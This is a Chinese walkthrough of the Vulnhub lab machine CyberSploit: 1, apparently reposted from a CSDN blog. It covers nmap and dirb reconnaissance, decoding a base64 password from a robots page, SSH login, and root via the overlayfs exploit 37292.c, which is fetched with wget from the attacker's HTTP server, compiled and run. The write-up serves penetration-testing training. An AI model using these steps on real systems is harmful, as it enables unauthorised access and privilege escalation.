靶机渗透测试(CyberSploit: 1)

靶机渗透测试(CyberSploit: 1):

Vulnhub靶机 CyberSploit: 1
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机难度:(Easy–Intermediate
目标:拿下三个flag.txt

在这里插入图片描述在这里插入图片描述



渗透流程:

1. 探测靶机ip地址(netdiscover -i eth0 -r 网关)

终端命令: netdiscover -i eth0 -r 192.168.10.0(网关)
得到靶机ip:192.168.10.70
在这里插入图片描述



2. nmap进行靶机端口服务扫描

终端命令:nmap -sS -Pn -A -p- -n 192.168.10.70 (靶机ip)
目标靶机开放 22/tcp–ssh, 80/tcp --http端口服务;

在这里插入图片描述



3. 根据端口服务进行渗透(80/tcp–http端口服务)

3.1. 登录web页面

登录web页面,80端口,进行靶机渗透第一步:信息收集;

在这里插入图片描述
3.2. 信息收集

首先发现web页面存在四个超链接,但是url均设置为#,不允许跳转。故先ctrl+u,查看一波源代码,在源代码最后部分,看到一组用户名:----username: itsskv------
(猜想为ssh登录用户名)

在这里插入图片描述
3.3. 目录扫描

使用kali中的dirb工具进行web目录扫描,(也可以使用御剑工具),看到敏感目录文件:/robots /robots.txt ;
终端命令:dirb http://192.168.10.70:80

在这里插入图片描述
跳转到/robots页面,可以看到一组代码,为base64加密;

在这里插入图片描述

进入base64在线加解密网站,进行base64解密;
Flag1:cybersploit{youtube.com/c/cybersploit}

flag1中存在一组代码,猜想可能为ssh登陆的密码;
base64加解密

在这里插入图片描述



4. ssh连接靶机(22/tcp–ssh端口服务)

4.1. ssh登陆

终端命令: ssh [email protected]
ssh 用户名@靶机ip
ssh登陆后,输入flag1中base64解码后的密码,>登陆成功

在这里插入图片描述
4.2. 普通用户权限

得到itsskv用户权限,ls展开当前目录,发现flag2.txt,发现为二进制代码,直接复制粘贴输出为字符串格式;

在线工具:字符转换工具

在这里插入图片描述
得到flag2!!! flag2: cybersploit{https:t.me/cybersploit1}
在这里插入图片描述



5. 提权:

5.1. 用户提权

利用exp内核提权,首先命令uname -a 查看内核版本;
发现是3.13.0,尝试利用overlayfs提权;
命令:searchspolit overlayfs,得到内核漏洞脚本;

下载37292.c文件,然后move移动到/var/www/html目录下
下载命令: cp /usr.share/exploitdb/exploits/linux/local/37292.c /root
移动命令: mv /root/37292.c /var/www/html

在这里插入图片描述
下载exp文件到靶机机器内

命令: python -m SimpleHTTPServer 8080(讲解如下,目的:开启web服务器)
wget http://192.168.10.8(kali攻击机的ip):8080/37292.c


启动一个简单的 web 服务器:

python -m SimpleHTTPServer 8080
or
python3 -m http.server 8080


在这里插入图片描述
gcc编译命令: gcc 37292.c -o test
执行脚本文件: ./test
提权成功,得到root权限!!!

在这里插入图片描述
进入/root目录,得到 finalflag.txt !!! 实验成功!!!

在这里插入图片描述



实验总结:

此次靶机难度不大,首先测试我们的信息收集能力,学会从源代码分析,此次实验中直接从源代码得到ssh登陆账户,robots为机器人协议,为web敏感目录,robots.txt文件(也称为漫游器排除协议或标准)是一个文本文件,用于告诉搜索引擎爬虫能抓取网站上的哪些页面,不能抓取哪些页面。

以及学会使用工具进行二进制与字符串之间的转换,当然也可以自己编写脚本,最后提权部分使用exp内核提权,开启简单web服务器是本次实验亮点;

猜你喜欢

转载自blog.csdn.net/weixin_46700042/article/details/109034483
今日推荐